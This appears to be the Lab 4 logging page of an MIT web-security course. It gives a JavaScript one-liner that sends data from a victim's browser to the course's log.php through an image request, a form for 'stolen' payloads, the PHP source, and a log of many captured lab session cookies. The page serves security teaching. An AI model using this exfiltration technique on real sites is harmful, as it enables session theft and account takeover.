You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Thu, 16 Apr 2026 04:40:34 +0000: student: PyZoobarLogin=grader#da50274219827a786f1aa457a8756e25c94456133a12270fdb29a9e9ff8ffa33 Thu, 16 Apr 2026 04:14:08 +0000: grader: PyZoobarLogin=grader#a21fa77e1c3d008f67b32f5a867c508ca9221872f451663dee8b55019badccc3 Thu, 16 Apr 2026 04:13:51 +0000: student: PyZoobarLogin=grader#eba25b47e881f6adfdac50eb595d1ee455d42b73e73f93b749a21d6ca2c289e9 Thu, 16 Apr 2026 03:51:04 +0000: grader: PyZoobarLogin=grader#07aaccc2d25c3ac21a926461fb86545497cc36b33bdab1c078b0a3c211dde012 Thu, 16 Apr 2026 03:50:48 +0000: student: PyZoobarLogin=grader#1b002a62694b6221c52bf61505355c5bfa33a8f3bdd90cebf994de08594a7b34 Thu, 16 Apr 2026 03:33:56 +0000: grader: PyZoobarLogin=grader#a45aeaa99ed4193d9a01e495067360f7fe215897d47701180b2ac94c1795eb46 Thu, 16 Apr 2026 03:33:35 +0000: student: PyZoobarLogin=grader#9d68ba38a4b8059991ae109996ef855adc89c9175dae704ccf39a24d60c85db1 Thu, 16 Apr 2026 03:32:29 +0000: student: PyZoobarLogin=grader#6c8be396bacff24fab7e35c682eeba71858b69ca60c8b3fa6100bd30339520fb Thu, 16 Apr 2026 03:31:12 +0000: test: test-cookie Thu, 16 Apr 2026 03:28:21 +0000: grader: PyZoobarLogin=grader#598a20c3c2d9c271b62719bb003109f97679f536187a5ff6a122e535335fb766 Thu, 16 Apr 2026 03:27:58 +0000: student: PyZoobarLogin=grader#ae96e009340fa9f99cb95b831c221ccb68f0e0192228dd5247789a423f70af58 Thu, 16 Apr 2026 03:25:27 +0000: grader: PyZoobarLogin=grader#474d91264f73c349754a772c9dc37dc5557602700212ad89835e292097fe2e6c Thu, 16 Apr 2026 03:25:14 +0000: student: PyZoobarLogin=grader#86d5b8416ee8e7ce73d4a3f86350da6146f0b35fa4cf063519fae10928f3a111 Thu, 16 Apr 2026 03:23:38 +0000: grader: PyZoobarLogin=grader#f3907b8b4420816063cbf2bc4332598fde8049e368144a189d12f975b442f719 Thu, 16 Apr 2026 03:23:17 +0000: student: PyZoobarLogin=grader#fde64a8021536e60d14ac02ba395322acdc8f245dab42bfd999a240732edc626 Thu, 16 Apr 2026 02:59:19 +0000: grader: PyZoobarLogin=grader#97df4a8b2fe7cef585c184e4068719720881758df388fac386e561e1250cc9d4 Thu, 16 Apr 2026 02:59:05 +0000: grader: PyZoobarLogin=grader#e63423294e607163cac5f9aec3ce8fd52585dedfca27be80126118ba94a7d8c0 Thu, 16 Apr 2026 00:58:21 +0000: grader: PyZoobarLogin=grader#a96c284c43d944c3d7b3428577a18563ff4d1469db1e9433a0e3d72a27141167 Thu, 16 Apr 2026 00:58:10 +0000: grader: PyZoobarLogin=grader#be07708ba27dc455419dab3cd205807a8e20b9a9772a638ba6f81ab4b713f249 Thu, 16 Apr 2026 00:57:47 +0000: student: PyZoobarLogin=grader#c62b9ba2fc19e076eec35255ec7ecb83fec544d4c53ca0e0c7994d696e93ee4b Wed, 15 Apr 2026 02:27:03 +0000: grader: PyZoobarLogin=grader#ccc7d2c5f3f4de60a3b94e8adf079fd5403c0172f0ca4e66deaa00f9bae77b73 Wed, 15 Apr 2026 02:26:53 +0000: grader: PyZoobarLogin=grader#2a9abeffcac1b88321c2b03c33e92f99b3137fe05ef373f6ca88d44d730a746b Wed, 15 Apr 2026 02:26:35 +0000: student: PyZoobarLogin=grader#1648c09469d2378ebbe4e4c841b6c1b5c10a2d28e53e762b9c0fa640ab679468 Wed, 15 Apr 2026 02:21:27 +0000: grader: PyZoobarLogin=grader#88f71a44c6f4ad2a42a2744f350b7b8578030f450164f2fc19d886d4ba750a71 Wed, 15 Apr 2026 02:21:18 +0000: grader: PyZoobarLogin=grader#e71181559afd8d8f4fd388ef4d45536a85186d297a6751724528b862da489c4b Wed, 15 Apr 2026 02:21:01 +0000: student: PyZoobarLogin=grader#1d2bb79abf80f362508ca5800233e89f8c239abc6f8c59c5da1ade8ee7ca9b44 Wed, 15 Apr 2026 02:18:53 +0000: grader: PyZoobarLogin=grader#9fa94c6ab3438f8a4046755dc5f1af740d519cac16806c292ce5da582b34c9db Wed, 15 Apr 2026 02:18:42 +0000: grader: PyZoobarLogin=grader#73c3dac7e00e0357a386e22b3a7be886ee740311575e9fd26fe0fbcff19e1e90 Wed, 15 Apr 2026 02:18:22 +0000: student: PyZoobarLogin=grader#3c69c0eaf9e4e6cfdd416591492218cde41e20dde328568d1c0eb3fba3dbd808 Wed, 15 Apr 2026 02:15:13 +0000: grader: PyZoobarLogin=grader#424c590ece0020278c197fe6dbffb936d6afd67571f1cbcfebeb95502f6db9cc Wed, 15 Apr 2026 02:15:04 +0000: grader: PyZoobarLogin=grader#5a64a51f39b2e71e1c276cb3d917a9adb309e149adc154431e791249ed8163fc Wed, 15 Apr 2026 02:14:47 +0000: student: PyZoobarLogin=grader#4ea63af218415e8f6ff91cb7c92c51a92f58d4d67a9745e25c06a90af3ffc0e7 Wed, 15 Apr 2026 02:11:17 +0000: grader: PyZoobarLogin=grader#dbf947ba353a8052dee45300bbb6647a5ce1911aca5e48fc459f9dc5760c786f Wed, 15 Apr 2026 02:10:55 +0000: student: PyZoobarLogin=grader#f5a6250196530673118af9d6be13c65fce910351442e001f0d63433ad39568cc Wed, 15 Apr 2026 02:07:36 +0000: grader: PyZoobarLogin=grader#a1aa9d92469dc2709863ed225dda42030b41adb78fa4ad5303f76e8145ed13b3 Wed, 15 Apr 2026 02:07:19 +0000: student: PyZoobarLogin=grader#c4edc07fc24fe69a58b55436c710aeb425027418a2913e46ee91be8c4b1ccda5 Wed, 15 Apr 2026 02:03:05 +0000: grader: test-cookie-123456 Wed, 15 Apr 2026 01:59:43 +0000: grader: PyZoobarLogin=grader#e394ba909c3d6c5ce56ad3cada278d1e0c038b3b7acf1293067c10e1100966c2 Wed, 15 Apr 2026 01:55:26 +0000: grader: PyZoobarLogin=grader#4992a398faee582fee7f362c6723624fd20f3f2d12f38f0a29e576cb444c7612 Wed, 15 Apr 2026 01:55:08 +0000: student: PyZoobarLogin=grader#ceb356ad8219d466d01bbe6953f72b67ca4a7211e5eebdd34d7050d0f1e06395 Wed, 15 Apr 2026 01:50:02 +0000: grader: PyZoobarLogin=grader#4bc50eed075cf9732bdaaed6d73ec500583d42e5fd1e9128c355492edc30be1b Wed, 15 Apr 2026 01:49:51 +0000: grader: PyZoobarLogin=grader#792cd1c8588b8a43c65b11a0457b70eace28a6ff8438af14d9506fc185448a3c Wed, 15 Apr 2026 01:49:28 +0000: student: PyZoobarLogin=grader#e4711baa4211ede6ae9c805572fb807976f0b4ca8d633b314b3a90dab9ab6160 Wed, 15 Apr 2026 01:32:09 +0000: grader: PyZoobarLogin=grader#c4bca0108ea42f0bff43adcf945a15e04ed19f7c63e2f41e9b55e911abcd99bb Wed, 15 Apr 2026 01:32:00 +0000: grader: PyZoobarLogin=grader#23d138b44dc2bbc9586efa34edf28fd137885a25b922b45e295ed7032c7eec59 Wed, 15 Apr 2026 01:31:42 +0000: student: PyZoobarLogin=grader#a23cb6f0dd661121d055e994bc5448bc581b8387689332a7b11aebf2c9deda09 Wed, 15 Apr 2026 01:20:11 +0000: grader: PyZoobarLogin=grader#81bebce2987ccc465b28493d9ba40b3bcd3dc88dc47fd9afa41e7cafc0e07a3b Wed, 15 Apr 2026 01:20:00 +0000: grader: PyZoobarLogin=grader#b2494f2bf01479c054cc0e3dda2330f05e334262e7829541c2d50019a78d51ef Wed, 15 Apr 2026 01:19:39 +0000: student: PyZoobarLogin=grader#d24c4188a66758c8e7e3827a74863f85bea72cda3b17d8eecde168fece4c7f07 Tue, 14 Apr 2026 15:28:40 +0000: grader: PyZoobarLogin=grader#8735c7465c46a60f6ea6357d22d89947c243025d2fc46d02cea81349fad84b9d Tue, 14 Apr 2026 15:28:22 +0000: student: PyZoobarLogin=grader#e80cf0ceee6197bdb93ffa0561afc08675aa4454122f2c32ce7e1038d6548d6e Tue, 14 Apr 2026 15:25:57 +0000: grader: PyZoobarLogin=grader#ea36d3776734761ea5d028e4c83aee998f0724fe957de4654d55e57680709176 Tue, 14 Apr 2026 15:25:48 +0000: grader: PyZoobarLogin=grader#c5b3eeefa59532fd4292751aef00f5a3f7b991a518095511bb02bd9d0139f841 Tue, 14 Apr 2026 15:25:29 +0000: student: PyZoobarLogin=grader#0046333300dd528571f49049ed708abba77d48fad912e78df0d3e21db21eb2b3 Tue, 14 Apr 2026 15:18:35 +0000: grader: PyZoobarLogin=grader#73851b6e2b1d57c6065dc2b3e2bbf2d958483421c30a5d014447c7e49795a08b Tue, 14 Apr 2026 15:18:25 +0000: grader: PyZoobarLogin=grader#64bce54a95cbcbbc3f04af53fdbb9ac7f42245c4cacf9eea94b6a6074a5b3b87 Tue, 14 Apr 2026 15:18:06 +0000: student: PyZoobarLogin=grader#cd97552062d1badcc53b8f33141b33619bc2779358e2503bc6b6d9dd47f21fd3 Tue, 14 Apr 2026 15:16:20 +0000: grader: PyZoobarLogin=grader#8caf9d98b3717db19516392cb10378dee95f094ef97ab84b7284715b115b1ee7 Tue, 14 Apr 2026 15:16:12 +0000: grader: PyZoobarLogin=grader#6d1331424d42d958ab1c123b97d6a468eabc7b6112395c52fa991619ccb5e6f9 Tue, 14 Apr 2026 15:15:52 +0000: student: PyZoobarLogin=grader#4d5afe734497ce08619a537ba2111408659f41d7accfc673a8b31876850d193f Tue, 14 Apr 2026 15:09:55 +0000: grader: PyZoobarLogin=grader#ca50bb8fc71ec7daf62eeebc5bae4a57b740aa6f68db487116ba7388f2de12f0 Tue, 14 Apr 2026 15:09:43 +0000: grader: PyZoobarLogin=grader#1f9c6e8a847f446c1443aeda8a661d6f194c7beaeb833dcced2ea234bb539651 Tue, 14 Apr 2026 15:09:25 +0000: student: PyZoobarLogin=grader#04793b3a232bcd269d8f7e976b42903e22b89937e624f5d5bf0ce1058f29ffee Tue, 14 Apr 2026 15:07:45 +0000: grader: PyZoobarLogin=grader#261f07ab57906c3706f51e93ecc9c894b95c0ca2d497c775d6d5ef06d5447c64 Tue, 14 Apr 2026 15:07:24 +0000: student: PyZoobarLogin=grader#a8dd736b23896999cf6be42c8671cdc573cb032bf77b7b18998bae5e1fd111b1 Tue, 14 Apr 2026 15:03:37 +0000: grader: PyZoobarLogin=grader#5452805dc35fed085ced6a5427dbf156be047e913293da960ba647981be88a26 Tue, 14 Apr 2026 15:03:19 +0000: student: PyZoobarLogin=grader#7ccecfee2b8c134ef39e357e01c9ef454e5a28db90a59bae807bafb98dedecc5 Tue, 14 Apr 2026 14:59:50 +0000: grader: PyZoobarLogin=grader#bd7c69e225d44f6a214d82869ed8b3def5e36b18035b3d73e1e0bcde5a6bf950 Tue, 14 Apr 2026 14:59:27 +0000: student: PyZoobarLogin=grader#6daa024bd15cadac9dda2029a04397e07dc52b558d06857d6ae41c26198edbb6 Tue, 14 Apr 2026 14:58:08 +0000: grader: PyZoobarLogin=grader#fc8bb5ace18fb8313a62825be311c3a509780504bdbff7241ab1e96c5af491b0 Tue, 14 Apr 2026 14:57:58 +0000: grader: PyZoobarLogin=grader#24ac8a7d22add15b8ec4fd8eb48386f3e162a54ff095aa4f87b80b0dfaf3887f Tue, 14 Apr 2026 14:57:40 +0000: student: PyZoobarLogin=grader#13f187cdd57a39023496ad6c6074d2c524b44ed9ee5fc793ac333feabf117579 Tue, 14 Apr 2026 14:55:14 +0000: grader: PyZoobarLogin=grader#202ac1165b83d3844563fd4bce26366d8d9b12096d79f20f2dee1ae79df39e28 Tue, 14 Apr 2026 14:55:04 +0000: grader: PyZoobarLogin=grader#1cb501bdbce54d10b8bb0f976a2ca28bf8decddbc46e12f42978c9d45e1d01be Tue, 14 Apr 2026 14:54:45 +0000: student: PyZoobarLogin=grader#180837b49725bcf5875ead89de987288759bdc35aa1824b3d3955afb797103b2 Tue, 14 Apr 2026 14:43:41 +0000: st28850: asdf/123 Tue, 14 Apr 2026 14:43:18 +0000: st28850: asdf/123 Tue, 14 Apr 2026 14:12:40 +0000: grader: PyZoobarLogin=grader#b78d97960ff06aa61f79470796fa3e5b38f5f185a9364657702af5804e4c132c Tue, 14 Apr 2026 14:12:11 +0000: student: PyZoobarLogin=grader#4b9376566c0b5c806bc194e5527423a95513e22ca5c7a14d5268c77aa4c79280 Tue, 14 Apr 2026 12:05:41 +0000: grader: PyZoobarLogin=grader#d635d3869a047c25415af526afea79ef7ac3e4526849c3bbf070a0b230f47a5c Tue, 14 Apr 2026 12:05:30 +0000: grader: PyZoobarLogin=grader#ea3e0947ccca547b8a843d752c2cae7313b4440bb2526c7347caf66099e5d1d4 Tue, 14 Apr 2026 12:05:10 +0000: student: PyZoobarLogin=grader#b3177a2c6ea14364c5db20527be625c564026668c435f21bfd942d3cdacf3184 Tue, 14 Apr 2026 11:59:14 +0000: grader: PyZoobarLogin=grader#978d10036493782ef8af13c9b7822d0c18ca09d962da6370f6bf26c39767d20c Tue, 14 Apr 2026 11:59:05 +0000: grader: PyZoobarLogin=grader#076eb2c1e1e9e573d5870d18a3a53b3545e0244f99db7a23d7c5e0954ed98db6 Tue, 14 Apr 2026 11:58:46 +0000: student: PyZoobarLogin=grader#691c42e1c5740caeec0ab605e2280b6be959ef396c7bcf9b8c722ec1f3a05005 Tue, 14 Apr 2026 11:54:44 +0000: grader: PyZoobarLogin=grader#690b0c0d1e6ee56da32ac07e3ed8bbeff41cb3f2cea35a2c4cb5fa82561aef9a Tue, 14 Apr 2026 11:54:36 +0000: grader: PyZoobarLogin=grader#78ebc0458d7421632e1ad6528eb4ce1bfc6ebcf4d97e9c97140d2e00aef366dd Tue, 14 Apr 2026 11:54:16 +0000: student: PyZoobarLogin=grader#425942c63c529b1602230e349da1efbab455db08c3f09ad06b367e2dc14d5de9 Tue, 14 Apr 2026 11:41:45 +0000: grader: PyZoobarLogin=grader#e1a430002fcf9655f3a1aa6bb8fbaba2700d13d40c2287ce5f59742817a7a1d6 Tue, 14 Apr 2026 11:41:33 +0000: grader: PyZoobarLogin=grader#994c474e5c044298a854bbe547a779ef6eb1c97f62407e33df56bdd1209a2e52 Tue, 14 Apr 2026 11:41:15 +0000: student: PyZoobarLogin=grader#e773ffe33d3d82743da5ad9c9dc09b94f653527dac4d1864b014e2c25c55db05 Tue, 14 Apr 2026 11:38:58 +0000: my-username: some-string Tue, 14 Apr 2026 11:38:02 +0000: grader: PyZoobarLogin=grader#bf74bab671a2d4edbadbb1f07338a3a4ca3d967418c5c2f827c79dc4497f777e Tue, 14 Apr 2026 11:37:50 +0000: grader: PyZoobarLogin=grader#ace305b6ba78aa0ceaf1c8972bdab7d6f4e3430b87f493906819be5443204968 Tue, 14 Apr 2026 11:37:31 +0000: student: PyZoobarLogin=grader#3ac9514d45327d69a6b23bf694b115df3945c5f93cb06dac735ba48c23533bfd Tue, 14 Apr 2026 11:31:27 +0000: grader: PyZoobarLogin=grader#ee6f4865f993a67ba77a38101e339cd725ff3643a65dc7684f5001ff925b9848 Tue, 14 Apr 2026 11:31:18 +0000: grader: PyZoobarLogin=grader#4a721a36390d51fe3b25143eab7f89c83740f3da8392a9065a9290dafbc214f6 Tue, 14 Apr 2026 11:30:59 +0000: student: PyZoobarLogin=grader#b180993a58bbc32025425f0d0529d7f059469b63f11366ada614f8b87a9a2517 Tue, 14 Apr 2026 11:26:49 +0000: grader: PyZoobarLogin=grader#64e87a949aad1f5ae199dea526bb368c426ed3c2ed6f2d6442ddbbcaee373457 Tue, 14 Apr 2026 11:26:17 +0000: student: PyZoobarLogin=grader#721a00773c76ec9f9fb991ee372ee944c62513113bea8cabde9fdd1060dad864 Tue, 14 Apr 2026 11:07:55 +0000: student: PyZoobarLogin=grader#beb29442b50ade15b1859c489d9ddef88fcc5444b70779bee8ee1547f75bbb6d
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2024-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2024-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>